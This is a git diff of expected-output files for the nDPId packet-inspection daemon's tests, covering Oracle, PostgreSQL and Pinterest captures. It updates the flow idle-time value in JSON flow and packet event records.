00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"oracle12.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1481291750025} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1481291750025,"flow_last_seen":1481291750025,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1481291750025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1481291750025,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1481291750025,"pkt":"UlQAEjUCCAAn5\/q0CABFAAA8b5VAAEAGbI0KAAIPCgBIi50iBfF8VCT6AAAAAKACchBeyAAAAgQFtAQCCAoFQUtvAAAAAAEDAwc="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1481291750026,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1481291750026,"pkt":"CAAn5\/q0UlQAEjUCCABFAAAsAf4AAEAGGjUKAEiLCgACDwXxnSIAeB4BfFQk+2AS\/\/\/WoAAAAgQFtAAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1481291750027,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1481291750027,"pkt":"UlQAEjUCCAAn5\/q0CABFAAAob5ZAAEAGbKAKAAIPCgBIi50iBfF8VCT7AHgeAlAQchBetAAA"} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":20,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1481291750025,"flow_last_seen":1481291750055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":1382,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1481291750055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1481291750025,"flow_last_seen":1481291750055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":1382,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1481291750055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1481291750025,"flow_last_seen":1481291750025,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1481291750025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1481291750025,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1481291750025,"pkt":"UlQAEjUCCAAn5\/q0CABFAAA8b5VAAEAGbI0KAAIPCgBIi50iBfF8VCT6AAAAAKACchBeyAAAAgQFtAQCCAoFQUtvAAAAAAEDAwc="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1481291750026,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1481291750026,"pkt":"CAAn5\/q0UlQAEjUCCABFAAAsAf4AAEAGGjUKAEiLCgACDwXxnSIAeB4BfFQk+2AS\/\/\/WoAAAAgQFtAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1481291750027,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1481291750027,"pkt":"UlQAEjUCCAAn5\/q0CABFAAAob5ZAAEAGbKAKAAIPCgBIi50iBfF8VCT7AHgeAlAQchBetAAA"} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":20,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1481291750025,"flow_last_seen":1481291750055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":1382,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1481291750055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"oracle12.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1481291750025,"flow_last_seen":1481291750055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":1382,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1481291750055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.72.139","src_port":40226,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"oracle12.pcapng","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-data-len":1382,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1481291750055} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 diff --git a/test/results/pgsql.pcap.out b/test/results/pgsql.pcap.out index 34ba20f94..b8b81599a 100644 --- a/test/results/pgsql.pcap.out +++ b/test/results/pgsql.pcap.out @@ -1,17 +1,17 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pgsql.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pgsql.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1103453983214} -00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1103453983214,"flow_last_seen":1103453983214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1103453983214,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1103453983214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA8\/wlAAEAGPbB\/AAABfwAAAbNqFTjJW\/IgAAAAAKACf\/\/rIgAAAgRADAQCCAoTQg0pAAAAAAEDAwA="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1103453983214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAARU4s2rJRrU9yVvyIaASf\/9MIgAAAgRADAQCCAoTQg0pE0INKQEDAwA="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1103453983214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA0\/wpAAEAGPbd\/AAABfwAAAbNqFTjJW\/IhyUa1PoAQf\/+1PwAAAQEIChNCDSkTQg0p"} -00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1103453983215,"flow_last_seen":1103453983215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1103453983215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1103453983215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8vZZAAEAGfyN\/AAABfwAAAbNrFTjJAbC8AAAAAKACf\/8s3wAAAgRADAQCCAoTQg0qAAAAAAEDAwA="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1103453983215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAARU4s2vJSeIcyQGwvaASf\/9g+wAAAgRADAQCCAoTQg0qE0INKgEDAwA="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1103453983215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA0vZdAAEAGfyp\/AAABfwAAAbNrFTjJAbC9yUniHYAQf\/\/KGAAAAQEIChNCDSoTQg0q"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983214,"flow_last_seen":1103453983217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983215,"flow_last_seen":1103453983217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1103453983214,"flow_last_seen":1103453998615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":1430,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1103453983215,"flow_last_seen":1103453983338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1103453983214,"flow_last_seen":1103453983214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1103453983214,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1103453983214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA8\/wlAAEAGPbB\/AAABfwAAAbNqFTjJW\/IgAAAAAKACf\/\/rIgAAAgRADAQCCAoTQg0pAAAAAAEDAwA="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1103453983214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAARU4s2rJRrU9yVvyIaASf\/9MIgAAAgRADAQCCAoTQg0pE0INKQEDAwA="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1103453983214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1103453983214,"pkt":"AAAAAAAAAAAAAAAACABFAAA0\/wpAAEAGPbd\/AAABfwAAAbNqFTjJW\/IhyUa1PoAQf\/+1PwAAAQEIChNCDSkTQg0p"} +00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1103453983215,"flow_last_seen":1103453983215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1103453983215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1103453983215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8vZZAAEAGfyN\/AAABfwAAAbNrFTjJAbC8AAAAAKACf\/8s3wAAAgRADAQCCAoTQg0qAAAAAAEDAwA="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1103453983215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAARU4s2vJSeIcyQGwvaASf\/9g+wAAAgRADAQCCAoTQg0qE0INKgEDAwA="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1103453983215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA0vZdAAEAGfyp\/AAABfwAAAbNrFTjJAbC9yUniHYAQf\/\/KGAAAAQEIChNCDSoTQg0q"} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983214,"flow_last_seen":1103453983217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983215,"flow_last_seen":1103453983217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1103453983214,"flow_last_seen":1103453998615,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":1430,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1103453983215,"flow_last_seen":1103453983338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","packets-captured":39,"packets-processed":39,"total-skipped-flows":0,"total-l4-data-len":2103,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1103453998615} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 39/39 diff --git a/test/results/pinterest.pcap.out b/test/results/pinterest.pcap.out index c7daf832e..9a31307b2 100644 --- a/test/results/pinterest.pcap.out +++ b/test/results/pinterest.pcap.out @@ -1,243 +1,243 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pinterest.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pinterest.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1605289710318} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289710318,"flow_last_seen":1605289710318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289710318,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605289710318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289710318,"pkt":"qtsDr8lk5EKm5WPyht1gCMmjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUgYwBu9VDYL21LWgegBAB9TESAAABAQgKz6ojDMK4Yvg="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605289710576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289710576,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuBjLUtaB7VQ2C+gBALgY8wAAABAQgKwrkTpM+oCrY="} -00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289712203,"flow_last_seen":1605289712203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289712203,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 